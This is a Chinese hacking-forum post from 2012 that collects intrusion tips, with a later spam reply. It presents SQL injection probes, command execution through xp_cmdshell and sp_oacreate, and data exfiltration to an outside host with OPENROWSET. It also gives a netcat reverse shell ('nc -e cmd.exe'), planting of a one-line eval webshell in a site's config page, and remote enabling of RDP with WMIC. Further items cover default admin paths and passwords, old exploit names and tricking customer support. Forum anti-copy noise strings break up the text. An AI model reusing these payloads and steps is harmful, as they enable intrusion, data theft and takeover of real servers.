中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]

---

作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关


SA点数据库分离搞法+语句:

注射点不显错,执行下面三条语句页面都返回正常。
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
7 B$ [$ k4 ?- m4 Y6 C% ~5 U; _9 n8 Mand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
3 k; R4 u3 M+ c. i' t可以列目录，判断系统为2000，web与数据库分离
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
在注射点上执行
0 a. n# T; ^& c! L- odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
页面返回正常，通过上面这个命令执行telnet我一个外网肉鸡得1433端口，然后netstat/an没有得到IP
' K' F/ m) G! y# s) b% o  x  A6 d还有我用NC监听得其他端口都没有得到IP。

1 n' S8 ~, s  p4 l5 n/ S. J& `通过注射点执行下面这两个命令页面都返回异常，在肉鸡上面同样也是没有得到IP。
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--

;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--

现在就猜想是不是数据库是内网而且不能连外网。
6 F' ]8 l( A4 g/ M5 q# f

access导出txt文本代码
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin

- c6 e9 }: v% n: b
5 E$ C2 F4 v4 `8 o3 x7 \0 M
自动跳转到指定网站代码头
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>


& {8 n5 p& e+ V5 r& i+ N, [入侵java or jsp站点时默认配置文件路径:
5 E& b. p( ?6 S9 K! [\web-inf\web.xml
tomcat下的配置文件位置:
* I4 c- O% a7 `, ^) t# P1 _6 {( @  T\conf\server.xml            (前面加上tomcat路径)
" ]+ z( H; f- q- P+ ?  ~* ^) p\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
2 i, u5 [. J8 V: M2 t
- x; Y# v, ?; m& F( O7 H9 O

( }0 B+ C2 a* i; w3 W( N' w检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
" q- x) }! V' p0 ]-1%23
% C9 F) B" \; j$ j9 z>
<
2 f9 \1 T% E: \1'+or+'1'='1
& t6 G8 s, V6 u# u' cid=8%bf
& ?! B/ g1 P% A8 N6 k  C
4 |( d3 ?( F7 {( W. f" }9 d; U' B全新注入点检测试法:
( h% T+ M7 U6 W+ P1 I在URL地址后面加上-1，URL变成：http://gzkb.goomoo.cn/news.asp?id=123-1，如果返回的页面和前面不同，是另一则新闻，则表示有注入漏洞，是数字型的注入漏洞;在 URL地址后面加上 -0，URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0，返回的页面和前面的页面相同，加上-1，返回错误页面，则也表示存在注入漏洞，是数字型的。
+ K  b% \# y1 F  x3 S: A4 M
在URL的地址后面加上'%2B'，URL地址变为：http://gzkb.goomoo.cn/news.asp?id=123'%2B'，返回的页面和1同;加上'2%2B'asdf，URL地址变为：http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf，返回的页面和1不同，或者说未发现该条记录，或者错误，则表示存在注入点，是文本型的。

搜索型注入判断方法:
6 G2 x5 m7 q8 ~6 t( a! R北京%' and '1'='1' and '%'='
北京%' and '1'='2' and '%'='

1 r4 O7 E) z5 T. _
COOKIES注入:
+ p: q+ x  y8 v) _! f3 m
+ `: }, h8 d/ P" F% Sjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
6 a9 ]1 R4 R3 N0 U
6 Y9 f/ `4 R3 ]; e* w3 x+ v1 E2000专业版查看本地登录用户命令:
net config workstation

3 l* \/ w! F2 y4 H. H1 |- B# R7 m" Q
; q) N' v+ x5 F0 l8 A  S2003下查看ipsec配置和默认防火墙配置命令:
. N/ [( i4 C, ~7 C( ]6 Qnetsh firewall show config
% l/ D4 Z; d5 w% `7 Wnetsh ipsec static show all

( s% t! w; `" n3 j. M不指派指定策略命令:
+ @, Q& a7 e0 |# W; x/ Vnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
netsh ipsec static show policy all  显示策略名


猜管理员后台小技巧:
" f' c1 h' p( ?. H& {" Y8 Sadmin/left.asp
7 I' O: z2 Y) j8 Cadmin/main.asp
admin/top.asp
admin/admin.asp
* y" X2 F3 W. z会现出菜单导航,然后迅雷下载全部链接
. Q, ]; B( u: @

社会工程学:
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
5 T3 x1 N# M# I7 k5 ]: T* F0 N$ ^  r! ^然后去骗客服
' @6 T2 Z2 o* S/ t/ {5 j
0 h4 e4 }, E: K1 [4 z0 h! q
$ N8 X* b7 }2 d8 I; I5 B, K  [统计系统使用的是IT学习者的统计系统，在网上下载了一套回来研究。这样的系统拿webshell一般就二种：1.数据库插一句话木马，客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录，发现数据库扩展名是asp的，默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb，用明小子的数据库工具打开，发现有防下载的表。管理员的默认密码是：ITlearner。数据库插一句话木马这条路是走不通了，现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码：
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">，
2 }+ a: l6 b1 a" v7 s3 I　　存为html文件打开后在最后详细来访信息记录多少条记录，默认为100条框输入100:eval request(chr(35))，点击保存。提示无法找到，结果发现。
1 n! Y5 j( }: r& z


6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞， 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口，用nodoom.exe入侵。（可用mydoomscan.exe查）



- p$ q4 t+ u3 _* \" [( VCMD加密注册表位置
) j8 ^5 @$ y/ R2 e5 h, E4 v(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
3 C" S3 l/ V3 S; o7 l' ?AutoRun

  p$ W4 o% W+ A0 `8 K2 M- Q(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
- |6 a' Z! |2 f$ B9 `( W8 TAutoRun
! G. s3 N; P+ l) w
8 G# k7 {3 l( R8 l% o# }
在找注入时搜索Hidden,把他改成test



/ R/ x7 n' N* n. Bmstsc /v:IP /console
. u: C7 N0 V$ A9 U3 S) _) O$ c
5 @! A- T3 ^2 V- d
一句话开3389:
; p9 M# D  r0 a
: e4 H. g. r7 p8 x; X/ n. F; E最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
9 V. A$ S6 l# d1 F( M( b; w开远程：WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.

8 I9 ?$ Y6 K  s5 c# u; X2 D
1 j3 \. v1 k$ F( a: T( Z知道表名，字段，使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
( r2 f/ b3 l' RInsert into admin(user,pwd) values('test','test')


NC反弹
4 i2 O2 P0 x8 C先在本机执行：　　　　　nc -vv -lp 监听的端口     (自己执行)   
9 @* q4 y# x5 [: _然后在服务器上执行：　 nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)

& J/ B+ F0 t2 y# i) j
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
3 \0 k$ |. d/ ?- K
3 P3 V6 E+ A6 p# V, o5 ]) J有时候我们入侵的时候，在webshell没有办法列举网站的目录包括dir也不行的时候，这个时候可以尝试用DOS命令SUBST转移目录
例如:
& z% X* |4 K" W* g% c, {& j8 G! xsubst k: d:\www\ 用d盘www目录替代k盘
subst k: /d  解除K盘代替

---

作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2